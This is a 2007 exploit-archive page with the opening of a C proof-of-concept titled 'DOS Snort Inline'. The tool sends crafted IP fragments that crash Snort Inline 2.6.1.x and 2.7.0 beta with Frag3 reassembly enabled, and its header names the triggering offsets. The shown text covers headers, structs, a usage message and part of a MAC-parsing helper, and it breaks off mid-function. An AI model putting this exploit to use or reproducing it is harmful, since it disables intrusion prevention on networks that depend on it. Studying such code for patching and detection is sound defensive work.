Home / exploits snort-dos.txt
Posted on 09 March 2007
/********************************************************* * DOS Snort Inline * Affected Versions: 2.6.1.1, 2.6.1.2, 2.7.0(beta) * Requirements : Frag3 Enabled, Inline, Linux, ip_conntrack disabled * Antimatt3r * antimatter@gmail.com * Offset needs to be supplied that would cause reassembly for different snort * fragmentation reassembly policies. Since the first packet is hardcoded 70-74 offset * will trigger the segfault. ********************************************************/ #include <stdio.h> #include <errno.h> #include <string.h> #include <stdlib.h> #include <signal.h> #include <unistd.h> #include <net/if.h> #include <net/ethernet.h> #include <sys/socket.h> #include <sys/types.h> #include <sys/ioctl.h> #include <arpa/inet.h> #include <netinet/in.h> #include <netinet/udp.h> #include <netinet/ip.h> #include <netinet/if_ether.h> #include <netpacket/packet.h> #define NOOP_FRAG_SLED 576 #define NOOP_SHORT 16 struct addr { uint32_t ip; char mac[ETH_ALEN]; }; struct dev { uint32_t index; char name[IFNAMSIZ]; }; int mac_aton(char *, char *); void usage(char *cmd) { fprintf(stderr, "usage: %s <device> <source_ip> <src_mac> <dst_ip> <dst_mac> <offset> ", cmd); } int mac_aton(char *amac, char *nmac) { char c; int i; unsigned int val; i = 0; while ((*amac != '